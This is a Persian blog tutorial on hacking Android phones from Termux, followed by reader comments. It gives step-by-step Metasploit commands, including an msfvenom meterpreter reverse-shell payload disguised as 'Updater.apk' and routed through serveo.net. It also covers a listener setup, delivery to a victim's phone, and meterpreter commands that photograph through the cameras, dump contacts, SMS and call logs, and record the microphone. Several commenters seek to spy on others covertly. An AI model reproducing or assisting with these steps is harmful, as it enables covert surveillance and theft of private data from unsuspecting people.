هک و امنیتtermuxاندرویدسیستم عامل ها

آموزش هک گوشی با ترموکس ۲ روش متفاوت – همراه با ویدیو آموزشی

()

آموزش هک گوشی با ترموکس – termux

سلام خدمت کاربران مجله آی تی همه این سوال واسه تون پیش میاد یا از خود من میپرسین چجوری گوشی یک نفر بدون اینکه بهشون فایل مخرب بدیم هک کنیم. ما در این آموزش میخوام به شما آموزش هک گوشی با ترموکس ( termux ) را بدهیم تا اخر این آموزش با ماه همراه باشید.

آموزش نصب متااسپلویت در ترموکس

مطالب مرتبط

آموزش هک گوشی با ترموکس – termux

خوب دوستان میریم برای آموزش.  اکسپلویت این آسیب پذیری برروی متااسپلویت ( metasploit ) وجود داره و ما خیلی راحت میتونیم از این اکسپلویت استفاده کنیم ، پس من در قدم اول دستور msfconsole رو میزنم تا متااسپلویت برای من اجرا بشه

هک گوشی با متااسپلویت

بعد از اجرای metasploit با دستور search اکسپلویت مورد نظرمو سرچ میکنم

هک گوشی

بعد از اجرای دستور بالا که دستور سرچ بود حالا دستور use اکسپلویت رو انتخاب میکنم

هک گوشی

بعد از انتخاب کردن اکسپلویت ( Exploit ) با دستور show options تنظیمات مربوط به این اکسپلویت رو میبینیم

هک گوشی اندروید با ترموکس

موارد مهم را به ترتیب تنظیم می کنیم ، اولین مورد RHOSTS است ، یعنی IP گوشی قربانی است که می توانید IP گوشی را به راحتی دریافت کنید (یک ابزار گرافیکی به نام Fing Network Tools برای موبایل وجود دارد که به راحتی می توانید IP های کسانی که هستند را مشاهده کنید.

آموزش کنترل کامپیوتر با گوشی از راه دور ( دو‌ روش عالی ) / 2022
خواندن

Fing Network Tools

بعد از تنظیم کردن ip تارگت دستور show action رو بزنید تا لیست کارهایی که ما میتونیم روی گوشی قربانی انجام بدیم رو بهمون بده

آموزش هک گوشی با ترموکس

خب بعد از دیدن لیست کار هایی که ما میتونیم روی گوشی قربانی انجام بدیم کافیه که با دستور set action  و بعد از دستوری که میخواهید روی گوشی اجرا بشه اینکار رو انجام بدید

هک گوشی اندروید

بعد از تنظیم کردن دستور بالا کافیه که run رو بزنید و منتظر باشید تا نتیجه رو به شما برگردونه.

هک فایل صوتی

خب میبینید که دستور اجرا شد و  داره name رو به ما من نشون میده حالا من دستور رو عوض میکنم و میخام که لیست فایل های صوتی رو ببینم

هک فایل صوتی با ترموکس

و تمام روش اول تموم شد موفق و پیروز باشید.

روش دوم آموزش هک گوشی با ترموکس

پیش نیاز های هک گوشی با ترموکس

  • نرم افزار Android TermuX (دانلود از فروشگاه Play)
  •  فریم ورک Metasploit نصب شده در TermuX (آموزش در اینجا)
  •  اینترنت فعال / اتصال WiFi
  • TermuX باید اجازه استفاده از Storage External را داشته باشد (برای این منظور فقط یکبار این فرمان را وارد کنید: “termux-setup-storage”)
  •  MiXplorer (برای امضای فایل APK، آن را از وب سایت UpToDown دانلود کنید)
  •  Apk Signer) MiX Signer برای MiXplorer، دانلود آن از فروشگاه Play)
  • از صفحه کلید هکر در خط فرمان TermuX استفاده کنید.

Port Forwarding

بسیاری از افراد از NGROK برای درگاه Port Forwarding استفاده می کنند. اما در NGROK ، می توانید هنگام اتصال مجدد به دامنه یا پورت جدید ، ایجاد کنید. دامنه و پورت اختصاصی فقط برای کاربران خاص است. به همین دلیل ، هر زمان که شروع به هک کنید ، باید یک فایل APK جدید برای NGROK ایجاد کنید.

دو روش متفاوت آموزش کرک سرور مجازی (vps) با کالی لینوکس
خواندن

در این آموزش ما از Serveo استفاده می کنیم. در Serveo ، می توانید دستی خود را در اینترنت بارگذاری کنید. برای استفاده از پورت Forveo forwarding ، باید بسته OpenSSH را روی TermuX نصب کنید. برای انجام این کار ، دستور زیر را در TermuX وارد کنید:

pkg install openssh

پس از نصب، این دستور را تایپ کنید:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net

در اینجا چند نکته وجود دارد که باید بخاطر بسپارید. اگر می خواهید پورت HTTP را فوروارد کنید ، پورت های مختلف را در هر دو بخش “Desired_Port” انتخاب کنید. اما در اینجا می خواهیم پورت TCP را جابجا کنیم. برای فرستنده پورت TCP ، باید همان پورت ها را در پورت Desired_Ports وارد کنید. همچنین “localhost” را تغییر ندهید. در اینجا ما می خواهیم یک پورت TCP را به جلو هدایت کنیم (برای مثال ۴۵۶۴). بعد از پورت جلو ، ممکن است اینگونه باشد:

ساخت فایل apk به همراه پیلود جاسازی شده

برای ایجاد فایل APK با Embedload Payload، این دستور را در ترموکس وارد میکنیم:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk

بعد از چند ثانیه منتظر ماندن:

همینجور که میبینید  میکنید فایل APK با پیلود جاسازی شده با موفقیت برای ما ساخته شد. Phone/SD-Card Storage -> downloads -> Updater.apk

همچنین شما می توانید با استفاده از برنامه APK Editor Pro نام (Default: MainActivity) و نسخه فایل APK تولید شده را تغییر دهید.

امضای فایل جدید APK ایجاد شده

ابتدا مدیر فایل MiXplorer را باز کنید و به فایل (APK Un-Signed (Updater.apk بروید.(در پوشه ی آپلود قرار می گیرد).

کدام ویندوز بهتر است ؟
خواندن

APK Un-Signed (Updater.apk) را کلیک کنید و دکمه MENU را در گوشه سمت راست بالای MiXplorer انتخاب کنید ، سپس “SUBSCRIBE” را انتخاب کنید.

این گزینه امضای فایل APK را به ما نشان می دهد. برای امضای خودکار و موفقیت آمیز فایل APK ، AUTO را انتخاب کنید.

در حال حاضر، فایل APK شما با نام filename)-signed.apk) با موفقیت امضا شده است و حجم ان نیز ۹٫۹KB میباشد.

راه اندازی Metasploit در TermuX

با وارد کردن دستور زیر در پنجره جدید ترموکس، چارچوب Metasploit را در TermuX فعال کنید:

msfconsole

برای نصب متاسپلویت به اول مقاله برین و نصب کنید

اگر این خطا را دریافت کردید: “Failed to connect to the database”، همانطور که در تصویر زیر نشان داده شد، دستورات زیر را در NEW SESSION وارد کنید.

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

بعد از چند ثانیه منتظر ماندن:

بعد از اینکه ابزار msfconsole شروع به کار می کند، دستورات زیر را با دقت وارد کنید:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z

نصب APK در گوشی Android تارگت

شما باید فایل Payload-Signed.apk را به دستگاه اندرویدی قربانی خود (مثلاً از طریق بلوتوث) -> نصب -> سپس باز کنید (مطمئن شوید دستگاه قربانی از اتصال اینترنتی فعال برخوردار است).

پس از باز کردن پرونده APK در تلفن قربانی ، فعال شدن جلسه Meterpreter را در بخش Metasploit خود مشاهده خواهید کرد. برای باز کردن یک جلسه Meterpreter از دستگاه قربانی خود ، روی دکمه برگشت کلیک کنید و این دستور را در جلسه Metasploit خود وارد کنید:

(sessions -i (Session ID

در (شناسه جلسه)، شماره جلسه Meterpreter را انتخاب کنید (به عنوان مثال هنگامی که قربانی شما فایل APK را باز می کند، این پیام را میبینید: Meterpreter Session Opened 1، در اینجا، ۱، شناسه جلسه Meterpreter است).

آموزش ورود به دارک وب dark web، دنیای اسرار آمیز
خواندن

شما با موفقیت از Android دستگاه قربانی خود دسترسی گرفتید.

در محیط متااسپلویت نیاز به راهنمایی دارید:

می توانید فرمان {meterpreter> help} را برای مشاهده تمام دستورات در دسترس وارد کنید.

از جمله دستورات مهم:

گرفتن تصویر از دوربین ها

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

دریافت همه مخاطبین

dump_contacts -o storage/downloads/X-Contacts.txt

دریافت همه پیام ها

dump_sms -o storage/downloads/X-SMS.txt

دریافت تماس های ورودی

dump_calllog -o storage/downloads/X-CallLog.txt

جاسوسی از طریق میکروفون

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3

چقدر این پست برای شما مفید بود?

لطفا برای امتیاز روی یک ستاره کلیک کنید.

Average rating / ۵. Vote count:

هیچ امتیازی تا الان ثبت نشده! اولین نفری باشید که به این پست امتیاز می دهید.

متاسفیم که این پست برای شما مفید نبود!

اجازه دهید این پست را بهبود ببخشیم!

به ما بگویید چگونه می توانیم این پست را بهبود ببخشیم؟

نمایش بیشتر

محمد حسین جعفری

ی آدم معمولی که هرچی بلده میخواد رو کنه

نوشته های مشابه

۸۹ دیدگاه

  1. سلام من وقتی ای پی فرد قربانی رو وارد میکنم و وقتی که دستور مورد نظر خودم برای مثال دریافت اطلاعات گوشی رو اجرا میکنم ، داخل بخش متصل شدن به ای پی اررور میده

  2. این ارور رو میده برای من چیکارش کنم
    Command as in package binutils
    Command ls in package coreutils
    Command gs in package ghostscript
    Command ts in package moreutils
    Command ps in package procps
    Command ts in package task-spooler

  3. صلم با ترموکس کد های دستوری رو از گوگل پیدا کردم و زدم تونستم لینک هک دوربین گوشی بگیرم اما رو گوشی طرف مقابل ارسال کردم و اون قبول کرد چیزی برام منتشر نشد و هک واتساپ. کد که باید بزنیم برا واتساپ کد میاد. کدی که از ترموکس گرفتم را میزنم اما اشتباه و هک گوشی که اصلا نمیش
    eror مید برا دانلود فایل های دستوری و … که نمیش گف ?

  4. سلام خسته نباشید من برنامه رو فرستادم برای اون طرف اونم نصبش کرد رفت داخلش ولی وقتی دستور sessions میزنم مینویسه no active session

  5. من الان هک شدم ولی حواسم بود ی ۳ دقیقه دستم رو دوربین گذاشتم بعد سایتو بستم لینکو بستم تا کی این عکس میگریه دائمیه یه موقت

  6. سلام خسته نباشید
    واسه ip گوشی ک برنامه فقد مال وای فایو نشون میده.بجاش میشه از همون لینکی ک واس هک وب کم استفاده میشه استفاده کرد؟چون اونم ip میده طبق چیزی ک گفتید…ممنون میشم جواب بدید…

  7. سلام خسته نباشید
    واسه ip گوشی ک برنامه فقد مال وای فایو نشون میده.بجاش میشه از همون لینکی ک واس هک وب کم استفاده میشه استفاده کرد؟چون اونم ip میده طبق چیزی ک گفتید…ممنون میشم جواب بدید

  8. سلام
    آیا بدون داشتن IP هدف و صرفا با داشتن شماره موبایل، امکان دسترسی به گوشی وی امکان پذیر هست یا خیر؟
    با تشکر

  9. سلام من اپ ترموکس رو نصب کردم و طبق گفته یه سایت دیگه برای اینکه بتونم آی پی شخصی ک توی تلگرام پی ام داده رو پیدا کنم باید باهاش چت کنم و دستورات
    apt update
    apt upgrade
    netstat_n
    رو وارد کنم و یه سری آی پی میاد ک آیپی اون شخصی ک میخوام هم جزوشونه
    ولی من در کل اصلا هیچ آی پی ندیدم نمیدونم من اشتباه راه رو رفتم یا نه
    روشهای سایت شما هم خیلی پیچیده بود و من درست متوجه نشدم میخواستم بدونم روش ساده تری نیس برای پیدا کردن آی پی توی همون اپ ترموکس؟؟
    ممنون میشم اگه کمکم کنین چون اون شخص خیلی مزاحمت ایجاد کرده من فقط میخوام از طریق آی پی بدونم ک این شخص مال کجاست

  10. سلام داداش من روش اول رو میزنم تویه برقراریه ارتیاط ارور میده.
    چی کار باید یکنم دقیقا. ممنون میشم راهنمایی کنی.

    1. درود به ادمین
      بنده تا مرحله نصب میرم یعنی اون دستور اتومات رو میزنم وبعداز اون بهم میگه مراحل نصب با موفقیت انجام شد برای نصب msfxonsole،رو واردکنید وقتی وارد میکنم برنامه برام بازنمیشه یعنی همین عکس قلب برام بالانمیاد

  11. سلام. ممنونم از آموزشتون. واسه روش اول فقط دستگاه هدف باید es file explorer روش نصب باشه وگرنه نمیشه درسته؟

    1. سلام
      ببخشید متااسپلویت رو نصبش کردم و اوکی شد.
      وقتی میخوام اجراش کنم و اون دستوری ک گفتین رو وارد میکنم این(CANNOT LINK EXECUTABLE “ruby”: library “/data/data/com.termux/files/usr/lib/ruby/2.7.0/aarch64-linux-android/bigdecimal.so” not found )رو میاره و اون صفحه ای ک داخل عکس هست رو نمیاره.
      مشکل کجاست؟

  12. سلام.داداش عکسای بخش اول اینقدر کوچیکه ک اصلا دیده نمیشه چی نوشتی.اگه میشه عکسای بخش اول رو بزرگ برا ایمیلم بفرس. ممنون

  13. سلام اقای گل من یه سوال فنی از شما دوست عزیز داشتم که وقتی رات سیو شد چجوری اطلاعات طرف برامون ارسال میشه یعنی داخل ترموکس میاد

    نباید توکن رباتی جیزی بزنیم تا اطلاعات تو ربات برامون بیاد
    با تشکر
    لطفا جواب بدید

  14. سلام خسته نباشید
    در روش اول بعد از زدنset action همراه کار مورد نظرم دوباره همون جمله میاد
    و مرحله بعدش کهrun رو بزنم نمیاد
    ممنون میشم راهنمایی کنید

  15. سلام من بعد از اینکه دستور run رو اجرا کردم اسم رو نمایش نمیده و خطای Error Connecting رو نمایش میده
    لطفا و خواهشا یا آموزش بروز کنید یا روش حلش رو یاد بدید این خیلی کاربردی تر از اینه که بدون دسترسی به گوشی طرف بتونی هکش کنی لطفا پاسخ بدید ممنون.

  16. سلام بعد از دستور run این متن رو مینویسه
    – Error Connecting
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary
    لطفا کمک کنید

    1. سلام خسته نباشید اگه برنامه رو نصب کنیم بعد از گوشی طرف پاکش کنیم بازم فعال میمونه ممنون میشم جواب بدین چون نمیخوام بفهمه ممنون میشم جواب بدین

  17. بخشید با این برنامه ای که معرفی کردید فقط میشه ip کسایی که به اینترنت وای فای ما وصل هستن گرفت
    الان من مثلا ip گوشی دوستم که اصلا یک بار هم به اینترنت من وصل نشد چطوری بگیرم؟

  18. سلام دوستان این حرکتی که آقای جعفری انجام داده کاملا واقعی و تایید شدس
    برای اینکه کارتون خوب پیش بره از روی عکس ها تقلید کنید که جواب مورد نظر رو بدست بیارید

    1. سلام خسته نباشید آموزشتون کامل دقیق و عالی بود فقط یه نکته اینکه برای هر دفعه باید صبر کنیم تا فرد روی اپلیکیشن کلیک کنه تا بتونیم تو ترموکس کار رو شروع کنیم یا روش دیگه ای هم هست ؟

      1. سلام داداش جان من ترمکسم یه صفحه نوشته قرمز اومده تاکیید کرده اپدیت کنم دوتا سایتم معرفی کرده برای اپدیت کردن ،برنامشو از همون سایته که معرفی کردم دان کردم نصب نمیشه،
        بعدازتوخوده ترومکس هم اپدیت اپگریت هم زدم اپدیت رو میگه انجام شد اپگریت رو میگه انجام نشد
        چیکارکنم دیگه راهنمایی کنید ممنون میشم ازلطفت
        یا ایمیل بزنی برام

  19. سلام و خسته نباشید
    میخواستم بدونم میتونیم از مثلا لیست فایل های صوتی چیزی رو دانلود کنیم و گوش کنیم اگه میشه با چه کدی؟

    1. سلام.خسته نباشید.من همه دستورالعمل ها رو اجرا کردم و کد رو به من داد برای هک واتس آپ.الان بعد از بدست آوردن کد باید چکار کنیم.ببخشید من آخرش رو متوجه نمیشم.الان من کد رو دارم باید چکار کنم.ممنون اگر پاسخ بدین.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا